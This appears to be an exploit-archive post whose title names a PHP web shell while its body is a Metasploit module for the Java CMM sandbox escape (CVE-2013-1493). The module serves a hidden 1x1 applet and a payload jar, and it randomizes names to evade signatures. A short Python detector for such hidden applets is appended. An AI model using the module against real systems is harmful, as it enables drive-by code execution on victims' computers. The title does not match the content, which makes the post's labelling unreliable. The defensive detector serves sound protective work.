STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',      # Vulnerability discovery and Exploit
          'juan vazquez'  # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  def setup
    # Load the pre-built applet classes shipped with the framework
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # Randomize the entry class name so the applet does not carry a fixed signature
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end
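As an added defensive example (not part of the post or of the Metasploit module above): the landing page this module serves embeds a 1x1-pixel applet with no fallback content that loads a randomly named .jar, and the check below scans an HTML body for applets of that shape. The sample page and the `find_hidden_applets` helper are constructed here for illustration.

```python
import re
from html.parser import HTMLParser

# Constructed sample: one applet shaped like the module's generate_html output
# and one ordinary, visible applet with fallback text.
SAMPLE_HTML = (
    '<html><head><title>Loading, Please Wait...</title></head>'
    '<body><center><p>Loading, Please Wait...</p></center>'
    '<applet archive="qZkVtRwp.jar" code="QwEr.class" width="1" height="1">'
    '</applet>'
    '<applet archive="chess.jar" code="Chess.class" width="400" height="300">'
    'Java is required to play.</applet>'
    '</body></html>'
)

class AppletCollector(HTMLParser):
    """Collects every <applet> element with its attributes and fallback text."""
    def __init__(self):
        super().__init__()
        self.applets = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "applet":
            self._current = {"attrs": {k.lower(): (v or "") for k, v in attrs},
                             "fallback": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["fallback"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "applet" and self._current is not None:
            self.applets.append(self._current)
            self._current = None

def _is_tiny(value, limit=10):
    """True when a width/height attribute parses to at most `limit` pixels."""
    m = re.match(r"\s*(\d+)", value)
    return bool(m) and int(m.group(1)) <= limit

def find_hidden_applets(html):
    """Return applets that are (near-)invisible, with the reasons each was flagged.
    Heuristic only: tiny dimensions trigger a hit; missing fallback text is noted."""
    parser = AppletCollector()
    parser.feed(html)
    hits = []
    for applet in parser.applets:
        attrs = applet["attrs"]
        if not (_is_tiny(attrs.get("width", "")) and _is_tiny(attrs.get("height", ""))):
            continue
        reasons = ["tiny-dimensions"]
        if not applet["fallback"].strip():
            reasons.append("no-fallback-content")
        hits.append({"archive": attrs.get("archive", ""),
                     "code": attrs.get("code", ""), "reasons": reasons})
    return hits
```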